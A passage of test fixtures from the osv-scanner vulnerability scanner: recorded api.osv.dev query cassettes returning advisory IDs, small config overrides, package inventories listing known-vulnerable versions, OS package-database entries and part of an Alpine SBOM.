"GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] } ] } headers: Content-Length: - "1081" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 997 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.3.1" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "flask-cors" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" }, "version": "2.2.0" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "pandas" }, "version": "0.23.4" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/requirements.txt_resolution_fallback url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 880 body: | { "results": [ {}, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-43qf-4rqw-9q2g", "modified": "2026-02-04T02:30:19.251090Z" }, { "id": "GHSA-7rxf-gvfg-47g4", "modified": "2026-02-04T04:27:15.173118Z" }, { "id": "GHSA-84pr-m4jr-85g5", "modified": "2026-02-04T02:57:32.875272Z" }, { "id": "GHSA-8vgw-p6qm-5gr7", "modified": "2026-02-04T02:42:09.564281Z" }, { "id": "GHSA-hxwh-jpp2-84pm", "modified": "2026-02-04T02:15:39.891834Z" }, { "id": "GHSA-xc3p-ff3m-f46v", "modified": "2024-09-20T20:01:25.449661Z" }, { "id": "PYSEC-2020-43", "modified": "2025-10-09T07:22:50.566622Z" }, { "id": "PYSEC-2024-71", "modified": "2025-10-09T08:27:44.186589Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "PYSEC-2020-73", "modified": "2023-11-08T04:02:12.263851Z" } ] }, {} ] } headers: Content-Length: - "880" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1610 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "certifi" }, "version": "2026.2.25" }, { "package": { "ecosystem": "PyPI", "name": "chardet" }, "version": "3.0.4" }, { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.3.1" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "idna" }, "version": "2.7.0" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" }, "version": "2.2.0" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "pytz" }, "version": "2026.1.0.post1" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "PyPI", "name": "urllib3" }, "version": "1.24.3" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/requirements.txt_transitive_default url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2083 body: | { "results": [ {}, {}, {}, { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-jjg7-2v4v-x38h", "modified": "2026-02-04T03:49:45.087439Z" }, { "id": "PYSEC-2024-60", "modified": "2024-07-11T17:42:33.704488Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, { "vulns": [ { "id": "GHSA-2xpw-w6gg-jr37", "modified": "2026-02-04T02:36:12.983430Z" }, { "id": "GHSA-34jh-p97f-mpxf", "modified": "2026-02-04T03:37:44.850742Z" }, { "id": "GHSA-38jv-5279-wg99", "modified": "2026-02-04T03:51:36.162029Z" }, { "id": "GHSA-g4mx-q9vg-27p4", "modified": "2026-02-04T03:30:16.767903Z" }, { "id": "GHSA-gm62-xv2j-4w53", "modified": "2026-02-04T03:37:15.919661Z" }, { "id": "GHSA-pq67-6m6q-mj2v", "modified": "2026-02-04T04:38:01.163387Z" }, { "id": "GHSA-v845-jxx5-vc9f", "modified": "2026-02-04T02:58:30.152562Z" }, { "id": "GHSA-wqvq-5m8c-6g24", "modified": "2024-11-18T22:47:07.792720Z" }, { "id": "PYSEC-2020-148", "modified": "2023-11-08T04:03:14.251187Z" }, { "id": "PYSEC-2021-108", "modified": "2023-11-08T04:06:04.829992Z" }, { "id": "PYSEC-2023-192", "modified": "2023-11-08T04:13:33.452167Z" }, { "id": "PYSEC-2023-212", "modified": "2023-11-08T04:13:39.165450Z" } ] }, {} ] } headers: Content-Length: - "2083" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1604 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "certifi" }, "version": "2026.2.25" }, { "package": { "ecosystem": "PyPI", "name": "chardet" }, "version": "3.0.4" }, { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.3.1" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0" }, { "package": { "ecosystem": "PyPI", "name": "idna" }, "version": "2.7" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" }, "version": "2.2.0" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "pytz" }, "version": "2026.1.post1" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "PyPI", "name": "urllib3" }, "version": "1.24.3" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/requirements.txt_transitive_native_source url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2083 body: | { "results": [ {}, {}, {}, { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-jjg7-2v4v-x38h", "modified": "2026-02-04T03:49:45.087439Z" }, { "id": "PYSEC-2024-60", "modified": "2024-07-11T17:42:33.704488Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, { "vulns": [ { "id": "GHSA-2xpw-w6gg-jr37", "modified": "2026-02-04T02:36:12.983430Z" }, { "id": "GHSA-34jh-p97f-mpxf", "modified": "2026-02-04T03:37:44.850742Z" }, { "id": "GHSA-38jv-5279-wg99", "modified": "2026-02-04T03:51:36.162029Z" }, { "id": "GHSA-g4mx-q9vg-27p4", "modified": "2026-02-04T03:30:16.767903Z" }, { "id": "GHSA-gm62-xv2j-4w53", "modified": "2026-02-04T03:37:15.919661Z" }, { "id": "GHSA-pq67-6m6q-mj2v", "modified": "2026-02-04T04:38:01.163387Z" }, { "id": "GHSA-v845-jxx5-vc9f", "modified": "2026-02-04T02:58:30.152562Z" }, { "id": "GHSA-wqvq-5m8c-6g24", "modified": "2024-11-18T22:47:07.792720Z" }, { "id": "PYSEC-2020-148", "modified": "2023-11-08T04:03:14.251187Z" }, { "id": "PYSEC-2021-108", "modified": "2023-11-08T04:06:04.829992Z" }, { "id": "PYSEC-2023-192", "modified": "2023-11-08T04:13:33.452167Z" }, { "id": "PYSEC-2023-212", "modified": "2023-11-08T04:13:39.165450Z" } ] }, {} ] } headers: Content-Length: - "2083" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_WithDetector_OffLinux.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OffLinux/ssh_version_errors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OffLinux/ssh_version_is_after_last_vuln_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OffLinux/ssh_version_is_before_first_vuln_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_WithDetector_OnLinux.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OnLinux/ssh_version_errors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OnLinux/ssh_version_is_after_last_vuln_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OnLinux/ssh_version_is_before_first_vuln_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/config-invalid/osv-scanner-test.toml ================================================ ! ================================================ FILE: cmd/osv-scanner/scan/source/testdata/exp-plugins-pkgdeprecate/deprecated-vuln/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/go-version-config.toml ================================================ GoVersionOverride = "1.21.7" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/nested/go-version-config.toml ================================================ GoVersionOverride = "1.21.7" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/nested/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/nested/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-git/osv-scanner.json ================================================ { "results": [ { "packages": [ { "//1": "version and commit are the same, so rust-openssl advisories should be reported", "//2": "note online reports CVE-2023-6180 as well due to matching commits for an implicit fork", "package": { "name": "https://github.com/sfackler/rust-openssl", "commit": "0f428d190410263e4daa65b917c0e84707a9c0ef", "version": "openssl-v0.8.1" } }, { "//1": "repo is different to the advisory, so only online checking will report anything", "package": { "name": "https://github.com/sfackler-fork/rust-openssl", "commit": "3b064fdb022912bbb98f5b8d9d111aeb6fec8f79", "version": "openssl-v0.10.23" } }, { "//1": "no version, so only online checking will report anything", "package": { "name": "https://github.com/openssl/openssl", "commit": "45fda76bc1b9fd74d10e85e0ce9b65a12dcc58b0" } }, { "//1": "version is for 3.5.0 which is vulnerable to CVE-2025-3416, but commit is for 3.5.1 which is not", "package": { "name": "https://github.com/openssl/openssl", "commit": "aea7aaf2abb04789f5868cbabec406ea43aa84bf", "version": "openssl-3.5.0" } }, { "//1": "commit is for a completely different repository that does have vulns", "package": { "name": "https://github.com/apache/orc", "commit": "17b30e96476be70b8773b2b807bab857fd3ceb39", "version": "v3.19.0" } }, { "//1": "matches an advisory whose repo url does not start with the http protocol, which should not matter", "package": { "name": "http://github.com/boostorg/boost", "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7", "version": "boost-1.67.0" } }, { "//1": "matches an advisory whose repo url does not start with the git protocol, which should not matter", "package": { "name": "git://github.com/boostorg/boost", "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7", "version": "boost-1.67.0" } }, { "//1": "matches an advisory even though the repo url has no protocol, which should not matter", "package": { "name": "github.com/boostorg/boost", "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7", "version": "boost-1.67.0" } }, { "//1": "matches an advisory whose repo url ends with .git, which should not matter", "package": { "name": "https://github.com/boostorg/boost", "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7", "version": "boost-1.67.0" } }, { "//1": "matches an advisory whose repo url does not end .git, which should not matter", "package": { "name": "https://github.com/capricorn86/happy-dom.git", "commit": "f82211036f434593c69b8e3680ea65203a46d315", "version": "v11.1.0" } }, { "//1": "matches advisories whose repo urls are a different case, which should be respected", "//2": "note in future this might change for github and gitlab, as they are not case-sensitive", "package": { "name": "https://github.com/Exiv2/exiv2", "commit": "931a40a746f5678dcc4625b06a2eb25fa4f00b34", "version": "v0.28.0" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-gitignore/subdir/test.gitignore ================================================ Gemfile.lock ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-gitignore/test.gitignore ================================================ ignored /yarn.lock composer* ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/my-package-lock.json ================================================ { "requires": true, "lockfileVersion": 1, "dependencies": { "ansi-html": { "version": "0.0.1" } } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner-custom-git-tag.json ================================================ { "results": [ { "source": {}, "packages": [ { "package": { "name": "github.com/openssl/openssl", "version": "openssl-3.0.4", "ecosystem": "GIT" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner-custom.json ================================================ { "results": [ { "source": {}, "packages": [ { "package": { "name": "stdlib", "version": "1.99.9", "ecosystem": "Go" } } ] }, { "source": {}, "packages": [ { "package": { "name": "toolchain", "version": "1.99.9", "ecosystem": "Go" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner-flutter-deps.json ================================================ { "results": [ { "packageSource": { "path": "/path/to/engine/DEPS", "type": "lockfile" }, "packages": [ { "package": { "name": "https://github.com/flutter/buildroot.git", "commit": "5d60bd2eb4642b64d00c845e5ca9f1ea41fd6db6" } }, { "package": { "name": "https://github.com/brendan-duncan/archive.git", "commit": "9de7a0544457c6aba755ccb65abb41b0dc1db70d" } } ] }, { "packageSource": { "path": "/path/to/engine/third_party/accessibility/README.md", "type": "lockfile" }, "packages": [ { "package": { "name": "https://chromium.googlesource.com/chromium/src", "commit": "4579d5538f06c5ef615a15bc67ebb9ac0523a973" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner-with-unscannables.json ================================================ { "results": [ { "source": {}, "packages": [ { "package": { "name": "stdlib", "version": "1.999.1", "ecosystem": "Go" } } ] }, { "source": {}, "packages": [ { "package": { "name": "toolchain", "version": "1.24.4", "ecosystem": "" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner.json ================================================ { "results": [ { "source": {}, "packages": [ { "package": { "name": "stdlib", "version": "1.24.4", "ecosystem": "Go" } } ] }, { "source": {}, "packages": [ { "package": { "name": "toolchain", "version": "1.24.4", "ecosystem": "Go" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-licenses/package.json ================================================ { "dependencies": { "babel": "^6.23.0", "human-signals": "^5.0.0", "ms": "^2.1.3", "type-fest": "^4.26.1" } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/installed ================================================ C:Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= P:apk-tools V:2.12.10-r1 A:x86_64 S:120973 I:307200 T:Alpine Package Keeper - package manager for alpine U:https://gitlab.alpinelinux.org/alpine/apk-tools L:GPL-2.0-only o:apk-tools m:Natanael Copa t:1666552494 c:0188f510baadbae393472103427b9c1875117136 D:musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 p:so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 F:etc F:etc/apk F:etc/apk/keys F:etc/apk/protected_paths.d F:lib R:libapk.so.3.12.0 a:0:0:755 Z:Q1opjpYqXgzmOVo7EbNe8l5Xol08g= F:lib/apk F:lib/apk/exec F:sbin R:apk a:0:0:755 Z:Q1/4bmOPe/H1YhHRzlrj27oufThMw= F:var F:var/lib F:var/lib/apk ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/not-a-lockfile.toml ================================================ _="whatever this is, it's not a lockfile!" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/osv-scanner-test.toml ================================================ ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/replace-local.mod ================================================ require ( golang.org/x/net v1.2.3 ) replace ( golang.org/x/net v1.2.3 => ./fork/net ) ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/status ================================================ Package: adduser Status: install ok installed Priority: important Section: admin Installed-Size: 849 Maintainer: redacted Architecture: all Multi-Arch: foreign Version: 3.118 Depends: passwd, debconf (>= 0.5) | debconf-2.0 Suggests: liblocale-gettext-perl, perl Conffiles: /etc/deluser.conf 773fb95e98a27947de4a95abb3d3f2a2 Description: add and remove users and groups This package includes the 'adduser' and 'deluser' commands for creating and removing users. . - 'adduser' creates new users and groups and adds existing users to existing groups; - 'deluser' removes users and groups and removes users from a given group. . Adding users with 'adduser' is much easier than adding them manually. Adduser will choose appropriate UID and GID values, create a home directory, copy skeletal user configuration, and automate setting initial values for the user's password, real name and so on. . Deluser can back up and remove users' home directories and mail spool or all the files they own on the system. . A custom script can be executed after each of the commands. ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/alpine.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* 